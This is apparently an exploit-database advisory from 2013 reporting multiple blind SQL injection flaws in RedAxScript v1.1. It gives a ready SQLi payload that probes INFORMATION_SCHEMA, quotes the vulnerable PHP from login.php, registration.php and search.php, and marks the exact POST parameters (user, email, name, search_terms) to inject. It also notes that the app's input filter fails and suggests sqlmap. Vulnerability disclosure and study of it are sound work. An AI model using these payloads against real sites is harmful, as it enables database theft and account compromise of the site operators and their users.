RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities

2013.12.06

Credit: KedAns-Dz

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[>] Title : RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities

[>] Author : KedAns-Dz
[+] E-mail : ked-h (@hotmail.com / @1337day.com)
[+] FaCeb0ok : fb.me/Inj3ct0rK3d
[+] TwiTter : @kedans

[#] Platform : PHP / WebApp
[+] Cat/Tag : Multiple , SQL Injection , Blind SQLi

[<] <3 <3 Greetings t0 Palestine <3 <3

- Blind SQL Injection ( 'POST' Query and 'GET' the full 'Information_Schema' ):
 AND (SELECT 8041 FROM(SELECT COUNT(*),CONCAT(0x3a6f79753a,(SELECT (CASE WHEN (8041=8041) THEN 1 ELSE 0 END)),0x3a70687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 
- POST Inject via HTTP headers attack's or HTTP debugger, HackBar / or use any toolkit like sqlmap, sql-ninja etc..

#### P.O.C [1] => in (login.php) | lines: ( 69 , 73.. 74) ##
****
  $post_user = clean ($_POST['user'], 0);
  $users_query = 'SELECT id, name, user, email, password, language, status, groups FROM ' . PREFIX . 'users WHERE user = \'' . $post_user . '\''; 
  mysql_query $users_result = mysql_query($users_query); 
****

[+] POST Data on > : user=[ SQL Injection Here ]

############################################################

#### P.O.C [2] => in (registration.php) | lines: ( 59.. 62 , 142..156)
****
 $r['email'] = clean ($_POST['email'], 3);
 $r['user'] = clean ($_POST['user'], 0);
 $r['name'] = clean ($_POST['name'], 0);  
****
 mysql_query mysql_query($query); 
 $query = 'INSERT INTO ' . PREFIX . 'users (' . $key_string . ') VALUES (' . $value_string . ')'; 
 $key_string .= ', ';  // if($last != $key),
 $key_string .= $key; 
 foreach($r as $key=>$value)
 $value_string .= '\'' . $value . '\''; 
****

[+] go to registration and POST Data on > : ( email, user, name ) =>
email=-[ SQL Injection Here ]--&user=-[ SQL Injection Here ]--&name=-[ SQL Injection Here ]--

############################################################

#### P.O.C [3] => in (search.php) | lines: ( 47, 61, 70.. 82) ##
****
 $search_terms = clean ($_POST['search_terms'], 1);
****
 $query .= ')';  // if($search),
 $query .= ' || ';  // if($search), if($last != $key),
 $query = 'SELECT id, title, alias, description, date, category, access FROM '...
 foreach($search as $key=>$value) // if($search),
 $search = array_filter(explode(' ', $search_terms)); 
****
 mysql_query $result = mysql_query($query); 
 $query .= ' ORDER BY date DESC LIMIT 50'; 
****

 [+] in Search area : POST Data on ( search_terms )  
 search_terms=[ SQL Injection Here ]

#### && Other Bug/Vulnerability in (reminder.php) when u do remind passwd :p
 lines : ( 57 , & 80.. 85 )
 [+] POST Data on > : ( email=[ SQLi ] )
 
## note : you can see befor any $_POST there is a function ' clean ' ( included clean.php )
but blind sqli attacks still workin' ,the clean func replace u'r input to alpha-num output just it

####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^  !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright &#169; 2013 Inj3ct0r Team | 1337day Exploit Database +>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz  , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.